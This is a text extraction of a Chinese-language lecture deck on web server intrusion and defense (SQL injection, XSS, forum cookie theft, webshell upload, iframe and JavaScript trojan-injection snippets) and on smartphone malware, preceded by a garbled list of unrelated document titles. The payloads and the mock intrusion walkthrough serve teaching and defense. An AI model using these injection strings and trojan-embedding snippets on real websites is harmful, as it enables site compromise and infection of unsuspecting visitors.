Microsoft PowerPoint - Web入侵+手機安全_講義.ppt [相容模式]

Similar documents
<4D F736F F F696E74202D A67EABD7A7F0A8BEA4E2AA6BBEE3B27AB1B4B0515FC1BFB8712E BACDBAE65BCD2A6A15D>

網路攻防戰 之 實務案例分析 個資防護

無投影片標題

<4D F736F F F696E74202D20B2C43033B3F55FA4ECB0A8A44AAB49A46AB4A6AFB5B2C43032B6B05FBAEBB5D8AAA95FC1BFB8712E BACDBAE65BCD2A

<4D F736F F F696E74202D20BAF4B8F4A7F0A8BEBED4A4A A44AAB49A4E2AA6BA4C0AA525FC1BFB8712E >

FileMaker 15 WebDirect 指南

投影片 1

epub 61-2

Microsoft PowerPoint _木馬入侵_講義.ppt [相容模式]

09 F9 128 peer to peer, P2P file transfer protocol bittorrent 10 P2P P2P GNU/ Linux P2P CC 單機版的智慧財產權 vs. 人權戰爭 1980 DVD content

一 個 SQL Injection 實 例 的 啟 示 頁 2 / 6 因 此, 在 知 名 網 站 上 看 到 SQL Injection, 讓 人 驚 心, 卻 不 意 外 網 站 專 案 外 包 是 目 前 業 界 的 常 態, 而 在 價 格 取 勝 的 制 度 下, 低 價 得 標 的 S

2016 勒索軟體白皮書

導讀 ASP.NET HTML ASP 第一篇 基礎篇第 1 章 認識 ASP.NET ASP.NET ASP.NET ASP.NET ASP.NET 第 2 章 認識 Visual Studio 20 開發環境 Visual Studio 20 Visual Studio 20 第二篇 C# 程式

XXXXXXXX

SEC-220

第三篇 第 10 章 - 管理者登入第 11 章 - 更改網路商店 Logo 第 12 章 - 系統設定第 13 章 - 商品上架第 14 章 - 付款方式設定第 15 章 - 出貨方式設定第 16 章 - 特價商品 oscommerce 103

目 录 简 介.3 ` 体 系 结 构...4 数 据 层...5 数 据 连 接 器...6 Tableau Server 组 件...7 网 关 / 负 载 平 衡 器...8 客 户 端 :Web 浏 览 器 和 移 动 应 用 程 序...8 客 户 端 :Tableau Desktop..

untitled

Microsoft Word - A doc

(CIP) Web /,. :, ISBN X.W T P393.4 CIP (2004) Web ( ) ( / ) : * 787

Adobe AIR 安全性


目录

13 根 据 各 种 网 络 商 务 信 息 对 不 同 用 户 所 产 生 的 使 用 效 用, 网 络 商 务 信 息 大 致 可 分 为 四 级, 其 中 占 比 重 最 大 的 是 ( A ) A 第 一 级 免 费 信 息 B 第 二 级 低 收 费 信 息 C 第 三 级 标 准 收 费

天津天狮学院关于修订2014级本科培养方案的指导意见

1. 概 述 1.1 扫 描 对 象 序 号 1 IP 地 址 域 名 1.2 漏 洞 等 级 分 布 风 险 类 型 数 量 高 风 险 1 中 风 险 5 低 风 险 4 信 息 类 4 7% 29% 高 风 险 36% 中 风 险 低 风

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操

使用手冊

Microsoft Word - SPEC

软件概述

温州市政府分散采购

<4D F736F F D D352DBED6D3F2CDF8D7E9BDA8D3EBB9DCC0EDCFEEC4BFBDCCB3CCD5FDCEC42E646F63>

chapter 2 HTML5 目錄iii HTML HTML HTML HTML HTML canvas

p.2 1 <HTML> 2 3 <HEAD> 4 <TITLE> </TITLE> 5 </HEAD> 6 7 <BODY> 8 <H3><B> </B></H3> 9 <H4><I> </I></H4> 10 </BODY> </HTML> 1. HTML 1. 2.

輕鬆學 Dreamweaver CS5 網頁設計..\Example\Ch0\ \.html..\example\ch0\ \mouse.txt..\example\ch0\ \ _Ok.html 學習重點 JavaScript 複製程式碼 mouse.txt Ctrl+C Ctrl+C 0-4

1. ( B ) IT (A) (B) (C) (D) 2. ( A ) (A) (B) (C) (D) 3. ( B ) (A) GPS (B) GIS (C) ETC (D) CAI 4. ( D ) (A) (B) (C) (D) 5. ( B ) (Stored Program) (A) H

ii Vue Bootstrap 4 ES 6 Vue Vue Bootstrap 4 ES 6 Vue 2 vue html vue html vue Vue HTML 5 CSS ES 6 HTML 5 CSS Visual Studio Code h

目錄

学 院 人 才 培 养 分 项 自 评 报 告 结 果 汇 总 表 主 要 评 估 指 标 关 键 评 估 要 素 自 评 等 级 1.1 学 校 事 业 发 展 规 划 合 格 1. 领 导 作 用 1.2 办 学 目 标 与 定 位 合 格 1.3 对 人 才 培 养 重 视 程 度 合 格 1

關於本書 Part 3 CSS XHTML Ajax Part 4 HTML 5 API JavaScript HTML 5 API Canvas API ( ) Video/Audio API ( ) Drag and Drop API ( ) Geolocation API ( ) Part 5

Microsoft Word - WebGoat用户指南-beta2.doc


IE10 WorkShop

<4D F736F F D C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1>

Enter the help project title here

产品手册

目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功 能... 7 一 銷 售 及 訂 單... 7 二 稅... 8 三 應 收 帳 款... 8 四 存 貨... 8 五 購 買... 9 六 應 付 帳 款... 9

<img>

AndroidUsersGuide.book

封面-12

結合IC卡之校園安全網頁系統的設計與實現

Microsoft Word - 01.DOC

02 2 成立 Facebook 粉絲專頁 Facebook Facebook Facebook 1, Facebook Facebook 1 Facebook 2-21

A-2 l 跨裝置網頁設計 A-1 <frameset> <frame> <noframes> (frame) HTML (navigation bar)

Asprain论坛的特色

資訊安全宣導 現在流 什麼? 加密勒索程式 加密勒索軟體捲土重來, 舉攻擊小型企業與個 戶 感染徒徑主要來 釣魚郵件, 但也出現透過軟體漏洞植入的 法 4 2

翻 墙 问 答 享 受 互 联 网 所 带 来 的 便 利, 以 及 私 隐 保 障, 本 来 就 如 其 他 许 多 天 赋 权 利, 这 已 是 一 个 人 应 该 享 有, 无 分 国 界 和 种 族 很 不 幸, 在 中 国 引 入 互 联 网 不 久, 中 国 就 滥 用 很 多 本 来

<A4E2BEF7B4FAB8D5B3F8A F52322E786C7378>


目 錄 摘 要...Ⅰ 第 一 章 簡 介 簡 介 研 究 動 機 研 究 目 的 文 獻 探 討...4 第 二 章 電 腦 犯 罪 之 定 義 網 路 犯 罪 分 析 電 腦 網 路 犯 罪 的 特

06 C H A P T E R 6-1 WWW 6-2 WWW WWW WWW

網站安全

DeskJet F2180 DeskJet F4185 Deskjet F4280 DeskJet D2460 OK N/A N/A DeskJet 1660 OK ( 無提供 Win 2000 驅動 ) N/A N/A PSC 1315 Photosmart 2575 Photosmart C13

目 录 一. 基 本 原 则... 4 二. 漏 洞 反 馈 和 处 理 流 程... 4 预 报 告 阶 段... 4 报 告 阶 段... 4 处 理 阶 段... 4 修 复 阶 段... 4 完 成 阶 段... 5 三. 安 全 漏 洞 评 分 标 准... 5 严 重... 5 高 危.

目 录 目 录 平 台 概 述 技 术 架 构 技 术 特 点 基 于 统 一 平 台 的 多 产 品 线 支 撑 先 进 性 安 全 性 开 放 性 高 性 能 和

Microsoft PowerPoint - SAGE 2010

The Applicibility of Google Maps/Earth and Urmap API to Real Estate Database* Jin-Tsong Hwang** Abstract Whether the real estate market is prosperous

<4D F736F F D20C9CFBAA3CAD0BCC6CBE3BBFAB5C8BCB6BFBCCAD4C8FDBCB6BFBCCAD4B4F3B8D95FBDA8D2E9B8E55F5F E646F63>

Microsoft Word - cr_xi_supported_platforms_tw.doc

FileMaker 16 ODBC 和 JDBC 指南

A SB-5000 SB-5000 i 0A-12 i Q&A 0A-9 i 0H-31 i 0H-1 0A-16 A-18 SB-5000 Model Name: N1502 A-1

* 2

RUN_PC連載_8_.doc

安全公告

Professional Ajax Ajax Adaptive Path, LLC Jesse James Garrett Ajax php Garrett WebG

專業式報告

中科曙光云盘系统

The golden pins of the PCI card can be oxidized after months or years

Enter the help project title here

2

1 IT IT IT IT Virtual Machine, VM VM VM VM Operating Systems, OS IT

Microsoft Word - 改版式网页全文.doc

Marketing_WhitePaper.PDF

Trend Micro

测试员第十期.doc

個資外洩, 不能河蟹 - 論個資外洩實務規範及處理 學員論著 個資外洩, 不能河蟹 - 論個資外洩實務規範及處理 第 58 期學習司法官吳宜展 * 目 次 ( ) ( )

User Group SMTP

關於本書 l 3 PhoneGap Appcelerator Titanium Sencha Touch (wrapper framework) Native App PhoneGap Build Native App Hybrid App Java Objective-C Android SDK

pcdashboard.book

互動網頁技術系列課程 HTML與CSS網站基礎設計 [12pt]

Cisco WebEx Meetings Server 2.6 版常见问题解答

Livescribe+ 用户指南

Chapter V.S. PC

1 情 况 综 述 2016 年 3 月, 全 省 公 共 互 联 网 网 络 安 全 状 况 整 体 评 价 为 良 本 月, 我 省 互 联 网 基 础 设 施 运 行 平 稳, 全 省 范 围 内 未 发 生 造 成 重 大 影 响 的 基 础 设 施 运 行 安 全 事 件, 未 发 生 网

Autodesk Product Design Suite Standard 系統統需求 典型使用用者和工作流程 Autodesk Product Design Suite Standard 版本為為負責建立非凡凡產品的設計師師和工程師, 提供基本概念設計計和製圖工具, 以取得令人驚驚嘆


Microsoft Word - 134招标文件.doc

PowerPoint 簡報

SiteView技术白皮书

电信行业网上营业厅

Transcription:

網路攻防戰之 Web 2.0 網站手法 與防範

大綱 Web Server 入侵手法 常見的漏洞利用介紹 網頁木馬簡介 論壇套件漏洞介紹 SQL Injection & XSS 手法介紹 Web Server 防禦策略 駭客攻擊 Web 之阻擋方式 惡意連結網站清單 建置社群 web2.0 網站之注意事項

Web Server 入侵手法 Microsoft 漏洞利用 網頁木馬 論壇套件漏洞利用 SQL Injection 利用 XSS 利用

補充資料 : OWASP 網站 : http://www.owasp.org OWASP Testing Guide v3 英文版下載處 http://www.owasp.org/images/5/56/owasp_testing_guide_v3.pdf 簡體中文版下載處 http://www.owasp.org/images/0/06/ OWASP 测试指南 ( 中文 ).pdf

SQL Injection 利用 引起的原因為網頁程式設計師在撰寫 asp 或 php 程式的時候, 對呼叫 (ADO 連線 ) 後端資料庫的帳號權限太大, 在加上對特殊字串以及語法沒有過濾或者過濾不完全而導致的 其最主要的攻擊目標為資料庫, 以取得下列資訊為主 : 獲取資料庫帳號及密碼 獲取作業系統帳號及密碼 利用 XP_CmdShell 執行 DOS 指令 猜測網頁實體路徑來進行換首頁或上傳 / 下載文件 上傳網頁木馬並植入後門

SQL 條件式語法漏洞 主要出現在登入帳號的 asp 或 php 程式上, 利用這個漏洞就可以不需要帳號密碼進入管理畫面 主要為網頁程式設計的瑕疵 : 沒有對單引號 或雙引號 '' 進行過濾 SQL 條件式 and or 的邏輯沒有考慮 SQL 語法的 where 子句所傳入的變數沒有檢查 SQL 語法中 - - 是表示該符號之後的語法或參數變成註解 語法 : or = or a'or'1=1- - 'or1=1- - ''or1=1- - or1=1- - 'ora ='a or = a = a ')or( a ='a

網頁應用程式語法 : 有問題版 sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "' 傳入惡意語法後 sql_cmd = "select * from mydatabase where id='" 'or 1=1 -- "' and passwd='" & Request("passwd") & "' 則變成前面的 where 條件為 1=1 而後面的 password 則因 - - 變成註解, 所以就不用密碼可進入

網頁應用程式語法 : 修正版 以程式設計的觀點來看, 將表單或查詢字串直接帶入 SQL 語法, 是一切弊病的源頭, 要徹底排除 SQL 資料隱碼攻擊, 必須從根源對症下藥 也就是必須在取得表單資料後, 針對單引號進行過濾, 然後再組合為 SQL 語法, 例如 : sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "'" 應該改為 myid = Replace(Request("id"),"'","'+chr(34)+'") mypwd = Replace(Request("passwd"),"'","'+chr(34)+'") sql_cmd = "select * from mydatabase where id='" & myid & "' and passwd='" & mypwd & "'"

SQL Injection 相關參考網址 SQL Injection ( 資料隱碼 ) 駭客的 SQL 填空遊戲 http://www.microsoft.com/taiwan/sql/sql_injection_ G1.htm http://www.microsoft.com/taiwan/sql/sql_injection_ G2.htm 資料隱碼 SQL Injection 的因應與防範之道 http://www.microsoft.com/taiwan/sql/sql_injection.h tm ASCII 碼對照表 http://www.lookuptables.com SQL Injection 檢測工具 ( 無殺傷力 ) http://www.databasesecurity.com/sqlinjectiontools.htm

XSS 利用 Cross Site Scripting(XSS) 跨網站功擊 : XSS 產生的原因是由於網頁程式設計師在撰寫程式時, 對於一些變數沒有充份過濾, 直接把使用者所送出的資料送往 Web Sever 執行 這樣的程式流程造成攻擊者可以送出一些特別製造的 Script 語法, 只要成功送往後端執行成功, 便可達成如 : 竊取 cookie 植入網頁木馬等原本不存在的 功能

XSS 的探測和繞過過濾 基本檢測語法 : <script>alert( xss )</script> 如果 <script> 被過濾, 則改用 <img src=javascript:alert( xss )> 如果 javascript: 被過濾, 則用 16 進位的值取代一些關鍵字 <img src= javascrip&#116&#58alert(/xss/) > 也可用空白字元 Tab 添加 <img src= javas cript:alert(/xss/) width=0> 或者用語法的事件與屬性來避免關鍵字被攔截 <img src= # onerror=alert(/xss/)> <img src= # style= xss:expression(alert( xss )); > 例如 :Yahoo Mail 的 XSS 語法 ( 已修正 ) <STYLE onload= alert( cookies exploit! );alert(document.cookie) >

網站 網頁掛馬語法 框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src=http://www.xxx.com/muma.txt></script> muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src=http://www.xxx.net/muma.js></script>")')} JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href="http://www.xyz.com( 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT>

XSS 相關參考網址 Cross Site Scripting questions and answers http://www.cgisecurity.com/articles/xss-faq.shtml Apache Cross Site Scripting Info http://httpd.apache.org/info/css-security/ How to prevent cross-site scripting security issues http://support.microsoft.com/kb/q252985/ Information on Cross-Site Scripting Security Vulnerability http://www.microsoft.com/technet/archive/security/news/c rssite.mspx?mfr=true Microsoft Anti-Cross Site Scripting Library V1.0 http://www.microsoft.com/downloads/details.aspx?familyid =9A2B9C92-7AD9-496C-9A89- AF08DE2E5982&displaylang=en

論壇套件漏洞利用 由於 asp 或 php 簡單易學, 所以網路常常可找尋到相關免費的程式架設論壇網站 但由於安裝程式的管理者常忽略需要修改原始設定及安全性選項, 使得依照 預設值 ( 瘋狂按下一步就會裝好 ) 的資料便可取得該論壇權限, 進而利用 社交工程 取得個人資料 常利用手法 : Cookie 欺騙 爆庫法 : 論壇 DB 爆庫 爆庫法 :%5c 路徑爆庫 SQL Injecion XSS 惡意超連結至網頁木馬 DDoS

Cookie 欺騙 Cookie 記錄著使用者的帳戶 ID 密碼之類的訊息, 如果在網上傳遞, 通常使用的是 MD5 方法加密 這樣經由加密處理後的訊息, 即使被網路上一些別有用心的人截獲, 也看不懂, 因為他看到的只是一些無意義的字母和數字 然而, 現在遇到的問題是, 截獲 Cookie 的人不需要知道這些字串的含義, 他們只要把別人的 Cookie 向伺服器提交, 並且能夠通過驗證, 他們就可以冒充受害人的身份, 登陸網站 這種方法叫做 Cookie 欺騙 手法 : 截獲他人 Cookie 內的帳號與密碼獲取權限, 搭配其它手法進行 掛馬 等更進一步攻擊

模擬案例 :JS 與論壇掛馬 入侵過程 目標 : 攻陷 XYZ 公司使該公司之客戶植入木 馬, 完成後竊取個資 觀察 : 該公司除 XYZ 網站外仍在同台 Web Server 中並有架設 Dvbbs 論壇

模擬案例 :JS 與論壇掛馬 入侵過程 入侵前準備 : 製作 MS04-023 MS06-014 MS07-004 的 Exploits 程式來呼叫木馬 於 JavaScript 中撰寫 document.write( <iframe src= 存放 Exploits 的網址 width=0 height=0></iframe> ); 並存檔為 123.js 來呼叫 Exploits 將 123.js 檔案進行變型及加密來避免被防毒軟體查殺 最後將 MS04-023 MS06-014 MS07-004 的 Exploits 程式及製作好的 123.js 檔案放置於 192.168.123.101 之跳板網站內 Muma 的目錄中備用

模擬案例 :JS 與論壇掛馬 入侵過程 入侵中過程 : 利用 Sniffer 技巧於 Dvbbs 論壇中截獲輸入於該論壇的 Cookie 利用該 Cookie 內儲存之帳號與密碼所取得之權限, 搭配論壇上傳程式, 將 WebShell (windows.asp) 上傳至該台 Web Server 的論壇目錄中 於 www.xyz.com.tw/dvbbs/windows.asp 中確認 WebShell (windows.asp) 已經成功傳入 目的是利用存放於 Dvbbs 論壇中的 WebShell 來將 XYZ 公司的網站掛馬

模擬案例 :JS 與論壇掛馬 入侵過程 入侵中過程 : 撰寫掛馬語法 <script language=javascript src='http://192.168.123.101/muma/123.js'></script> 為避免存放 123.js 的跳板網站 URL 網址被阻擋, 將該網址進行 URL 編碼來逃避偵測 <script language=javascript src='http://%31%39%32%2e%31%36%38%2e%31% 32%33%2E%31%30%31%2F%6D%75%6D%61/123.js ' > </script> 利用 WebShell (windows.asp) 將語法掛馬後, 查看 XYZ 公司網頁 HTML 原始碼是否有被異動

模擬案例 :JS 與論壇掛馬 入侵過程 入侵後感染 : 當使用者瀏覽 XYZ 公司的網站後, 變會觸發 HTML 內的掛馬語法 感染流程 : URL 編碼的掛馬語法 轉換 跳板網站中的 123.js 解析 JS 內變型及加密的 Exploits 程式網址 還原 Exploits 程式網址內的木馬程式 植入

論壇 DB 爆庫 : 原理 Access 資料庫的儲存隱患 : 在 ASP+Access 應用系統中, 如果能獲得或猜到 Access 資料庫的儲存路徑和資料庫名稱, 則該資料庫就可以被下載到本地 例如 : 對於線上書店的 Access 資料庫, 人們一般命名為 book.mdb store.mdb 等, 而存儲的路徑一般為 URL/database 或乾脆放在根目錄 URL/ 之下 這樣, 只 要在瀏覽器地址欄中輸入網址 : URL/database/store.mdb, 就可以輕易地把 store.mdb 下載到本地的機器中 Access 資料庫的解密隱患 : 由於 Access 資料庫的加密機制非常簡單, 所以即使資料庫設置了密碼, 解密也很容易 由此可見, 無論是否設置了資料庫密碼, 只要資料庫被下載, 其資訊就沒有任何安全性可言了

論壇 DB 爆庫 : 解決方案 非常規命名法 : 不要簡單地命名為 book.mdb 或 store.mdb, 而是要起個非常規的名字, 例如 :faq19jhsvzbal.mdb, 再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之類的深層目錄下 使用 ODBC 資料來源 : 使用 ODBC 資料來源, 不要把資料庫名稱直接寫在 ASP 程式碼中, 例如 : DBPath = Server.MapPath(./akkjj16t/kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ) conn.open driver={microsoft Access Driver (*.mdb)}; dbq= & DBPath 改成 : conn.open ODBC-DSN 名稱 就不會發生這樣的問題了

在 IIS 的設定 : 將放置 Access 資料庫的資料夾 ( 或虛擬目錄 ) 給予 寫入 但不要給予 讀取 的權限即可, 如此一來, 就算知道儲存路徑和資料庫名稱, 一樣無法從 Web 下載 在主目錄 應用程式設定 應用程式對應 新增 執行檔 : C:\WINNT\System32\inetsrv\ism.dll 副檔名 :.mdb 限制於 :GET,POST ( 缺點 : 以後要編修 Access 資料庫, 很容易忘記有鎖權限或鎖副檔名 )

Web Server 防禦策略

駭客攻擊 Web 之阻擋方式之一 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 首頁 不知情的一般使用者 跳版網站

阻擋策略 : 設備 網頁應用程式防火牆 封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包 服務 搜尋引擎的阻擋 弱點掃描 滲透測試 防毒牆 ( 由外到內 ) 阻擋傳入的木馬

駭客攻擊 Web 之阻擋方式之二 駭客 知名的官方網站 [ 上傳 ] 具 FSO 功能的網頁木馬 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站

阻擋策略 : 設備 SUS / WSUS 修補系統漏洞 Web DB 的權限控管 企業型防毒軟體及防間諜軟體 LOG 及事件分析軟體 服務 搜尋引擎的阻擋 弱點掃描 滲透測試 程式碼檢測 檢視與設定資料夾權限 移除不需要及罕用的服務 變更系統與 Web 相關預設值 Web 與 DB 的備份軟體

駭客攻擊 Web 之阻擋方式之三 駭客 知名的官方網站 不知情的一般使用者 首頁 跳版網站 原生型木馬 漏洞型網馬

阻擋策略 : 設備 網頁應用程式防火牆 封鎖異常來源 IP 入侵偵測系統 IDS/IDP 觀察異常封包 服務 收集易被植入或經常感染的網址成為黑名單 防毒牆 ( 由內到外 ) 阻擋傳輸的木馬 Proxy Server 的黑白名單 網址過濾或攔截的設備與軟體

駭客攻擊 Web 之阻擋方式之四 駭客 知名的官方網站 不知情的一般使用者 跳版網站

阻擋策略 : 設備 Windows Update / Microsoft Update 修補系統漏洞 單機型防毒軟體及防間諜軟體 個人單機型防火牆 服務 善用線上掃毒比對不同防毒 本機 HOSTS 惡意網址清單 改用其它瀏覽器可以改善 ( 但不能完全避免 ) 網頁瀏覽安全防護軟體 個人資料的備份軟體

建置社群 web2.0 網站之注意事項 一定是程式碼有問題? SSL / https 加密安全 Web2.0 竊取密碼 : 防護措施 圖形密碼驗證

PHP 程式撰寫上該注意到的事項 首先對於安全的認知, 就是外部拉到的資料 ( 使用者送出的資料 ), 都是不安全的, 都要做嚴謹的檢查. 哪些是外部拉到的資料 ( 使用者送出的資料 )? GET: $_GET (Form submit/ 網址列參數 ) POST: $_POST REQUEST: $_REQUEST COOKIE: $_COOKIE JSON/AJAX/ 合作廠商送的資料 / 讀取檔案, 要將資料寫入 DB 的 Data 等.

PHP 設定檔 (php.ini) register_global = off ( 全域變數 ) magic_quotes_gpc = off (' => \', " => \", %00 => \ 0) ( 建議 magic_quotes_gpc = off 自己處理 ) display_error = off ( 在網頁上顯示錯誤訊息 ) log_error = on ( 紀錄錯誤訊息 ) allow_url_fopen = off ( 可開啟遠端網頁 ) expose_php = off ( 顯示 PHP 版本資訊 ) open_basedir = ( 允許開啟的目錄 ) safe_mode = on ( 安全模式 ) disable_function = ( 禁止使用的函數 ) safe_mode_include_dir = ( 允許 include 的目錄 )

SSL / https SSL: SSL(Secure Sockets Layer) 採用公開金鑰技術, 保證兩個應用間通信的保密性和可靠性, 使客戶與伺服器應用之間的通信不被攻擊者竊聽 HTTPS (Hypertext Transfer Protocol Secure) 是 http 和 SSL/TLS 的組合, 用以提供加密通訊及對網路伺服器身份的鑑定 維基百科對於 Https 的說明 : http://zh.wikipedia.org/wiki/https

SSL / https 換句話說 : https 只保障瀏覽器與網站之間的利用 SSL 所產生的網路傳輸安全 ; 也就是說, 如果資料 ( 帳號 / 密碼 ) 在傳輸前或傳輸後被竊取, 那是端點的安全控管與資料傳輸一點都無關

手機防護

手機防護 當使用者越來越仰賴 iphone Android 等智慧手機 平板電腦, 單位的安全防護網將會面臨有別於傳統的新風險 不只要防範鎖定手機伺機入侵的木馬和惡意程式, 還得 預防遺失手機而導致資料外洩的風險 伴隨著手機進入單位的 3G 網路, 更是輕易跳過內網 管制的防線 傳統的防護網已經逐漸瓦解, 單位必須正視行動應用帶來的新風險, 才能有效鞏固防護網

私人手機成行動安全管理的困境 許多 IT 部門主管最傷腦筋的一件事情就是, 現在很 多用於企業行動服務的手機都是私人的, 並非公司配發的, 這也造成公司在行動裝置控管上的困難

手機越獄不違法但不安全 最近接連陸續傳出手機應用程式的安全威脅事件, 就連 Android 官方軟體市集也一連出現了 50 多款通過審查上架的 App 暗藏惡意木馬程式, 迫使 Google 動用遠端刪除權限來移除使用者設備中的惡意程式

再加上手機破解 越獄被美國政府視為消費者合法使用權力之一, 各種破解工具越來越自動化, 甚至出現全自動的破解 App, 按一個鈕就可以讓 iphone 越獄 讓 Android 破解, 使用者可以任意取得管理者權限, 讓智慧手機預設的安全機制防護洞開, 更容易成為惡意程式竊取企業資料的溫床

新 Android 惡意軟體會側錄通話內容 在手機被感染後, 用戶通話時該軟體就會將通話內容錄音並以.arm 格式存在 SD 記憶卡 /shangzhou/callrecord 目錄中 參考資料 : http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-yourconversations.aspx

手機防護 :Android 目前已知感染套件如下, 如果您有安裝, 最好趕快解除安裝 Advanced App to SD Advanced Barcode Scanner Advanced Compass Leveler Advanced Currency Converter Advanced File Manager Advanced Sound Manager App Uninstaller Basketball Shot Now Best password safe Bowling Time Bubble Shoot Chess Color Blindness Test Dice Roller Falling Ball Dodge Falling Down Finger Race Funny Face Funny Paint Hilton Sex Sound Hot Sexy Videos Magic Hypnotic Spiral Magic Strobe Light Music Box Omok Five in a Row Photo Editor Piano Quick Delete Contacts Quick Notes Scientific Calculator Screaming Sexy Japanese Girls Sexy Girls: Japanese Sexy Legs Spider Man Super Guitar Solo Super History Eraser Super Ringtone Maker Super Sex Positions Super Sexy Ringtones Super Stopwatch & Timer Supre Bluetooth Transfer Task Killer Pro Tie a Tie 几何战机 _PewPew 下坠滚球 _Falldown 大家来找茬 多彩绘画 投篮高手 致命绝色美腿 桌上曲棍球 躲避弹球 蜘蛛侠 裸奔先生 Mr. Runner 墨水坦克 Panzer Panic 掷骰子 软件强力卸载 資料來源 : http://blog.aegislab.com/index.php?op=viewarticle&articleid=80&blogid=2

手機防護 :Android 解決策略 : 不安裝 來路不明 的小遊戲或 軟體 移除不需要或不常用的的小遊戲或軟體 安裝防毒軟體或防護程式 安裝 Android Market Security Tool

資料來源 : http://blog.aegislab.com/index.php?op=viewarticle&articleid=87&blogid=2

手機防護 :Android 當我們有一天在某個咖啡店享用著免費無線網路時, 很開心的登入自己的 Facebook 帳戶, 然後旁邊一個拿著 Android 手機的人, 有可能透過一個叫做 FaceNiff 的 App 輕易獲取我們帳戶的控制權, 然後隨意發表訊息 而唯一的解決方法, 就是我們在使用公用無線網路環境時一定要使用加密連線 現在 Facebook 等 網站服務都已經內建 強制 https 加密連線 的功能, 一定要記得事先做好設定

手機防護 :iphone 解決策略 : 不安裝 來路不明 的小遊戲或軟體 移除不需要或不常用的的小遊戲或軟體 安裝防毒軟體或防護程式 使用 原裝 不要越獄或破解 iphone 最容易感染的環境 : 1. 越獄 ( JB, Jailbreak ) 過 2. 安裝了 SSH 且沒有更改預設密碼 3. 喜好在 App Stone 搜尋安裝軟體

手機防護 :iphone:itunes & QuickTime itunes / QuickTime 更新 http://www.apple.com/tw/itunes/ Apple 安全性更新 http://support.apple.com/kb/ht1222?viewlocale=zh_tw&locale=zh_tw

補充資料

近期 Joomla & Wordpress 漏洞 資料來源 : http://www.exploit-db.com/ 解決方法 : 更新版本 移除第三方外掛套件 與校務系統切割網段 檢查資料目錄權限

電腦安全性的七大步驟 1. 評估使用電腦的風險, 隨時提高警覺不要亂點選 2. 使用防毒軟體及防間諜軟體, 並搭配線上掃毒 3. 保持更新作業系統及應用程式等軟體為最新狀態 4. 檢查您的作業系統及 IE 安全性設定 5. 使用個人 ( 單機 ) 防火牆 6. 建立穩固的密碼 7. 執行日常工作安全性維護, 例如 : 更新 掃毒

結論 Web Server 入侵手法 常見的漏洞利用介紹 網頁木馬簡介 論壇套件漏洞介紹 SQL Injection & XSS 手法介紹 Web Server 防禦策略 駭客攻擊 Web 之阻擋方式 惡意連結網站清單 建置社群 web2.0 網站之注意事項

講師 : 呂守箴 E-Mail:shooujen@gmail.com 部落格 : 網路攻防戰 :http://anti-hacker.blogspot.com Plurk 噗浪 : http://www.plurk.com/openblue FaceBook: http://www.facebook.com/openblue 粉絲團 :http://www.facebook.com/netwargame 網路直播頻道 :http://zh-tw.justin.tv/openbluetv